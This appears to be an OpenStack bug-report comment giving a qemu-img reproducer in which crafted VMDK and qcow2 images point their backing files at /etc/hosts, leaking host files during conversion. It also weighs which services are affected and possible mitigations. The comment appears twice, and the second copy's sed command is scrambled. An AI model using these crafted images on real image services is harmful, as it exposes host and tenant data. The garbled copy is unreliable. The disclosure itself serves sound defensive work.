Here's a reproducer of the underlying operation without the need for any nova or glance:
qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat
sed -i 's#leak-flat.vmdk#/etc/hosts#' leak.vmdk
qemu-img convert -f vmdk -O raw leak.vmdk leak.raw
head -n1 leak.raw
Note that I can repro the behavior with qemu-img using qcow2 as well:
qemu-img create -f qcow2 -F raw -b /etc/hosts leak.qcow 1M
qemu-img convert -O raw leak.qcow leak2.raw
head -n1 leak2.raw
Which means even people that don't use vmdk can't just ban that format to work around this, I suspect.
This helps quantify what I think is going on here under the covers so we can determine which other projects are affected. Glance does effectively the above commands if image conversion is enabled, so I suspect it is affected without needing nova at all, if and when image conversion is in use. I'll have to check.
Not sure about cinder, but I suspect if it can lay down a COW-based image on a volume in raw format, it too is probably affected.
I'm guessing that maybe we'll need to come up with some difficult rules about backing file locations and inspect/reject based on those. I would say that nova requiring that backing files are in /var/lib/nova would be enough, but that wouldn't prevent me from snooping someone else's image if I could determine their UUID.
Here's a reproducer of the underlying operation without the need for any nova or glance:
qemu-img create -f vmdk leak.vmdk 1M -o subformat= monolithicFlat flat.vmdk# /etc/hosts# ' leak.vmdk
sed -i 's#leak-
qemu-img convert -f vmdk -O raw leak.vmdk leak.raw
head -n1 leak.raw
Note that I can repro the behavior with qemu-img using qcow2 as well:
qemu-img create -f qcow2 -F raw -b /etc/hosts leak.qcow 1M
qemu-img convert -O raw leak.qcow leak2.raw
head -n1 leak2.raw
Which means even people that don't use vmdk can't just ban that format to work around this, I suspect.
This helps quantify what I think is going on here under the covers so we can determine which other projects are affected. Glance does effectively the above commands if image conversion is enabled, so I suspect it is affected without needing nova at all, if and when image conversion is in use. I'll have to check.
Not sure about cinder, but I suspect if it can lay down a COW-based image on a volume in raw format, it too is probably affected.
I'm guessing that maybe we'll need to come up with some difficult rules about backing file locations and inspect/reject based on those. I would say that nova requiring that backing files are in /var/lib/nova would be enough, but that wouldn't prevent me from snooping someone else's image if I could determine their UUID.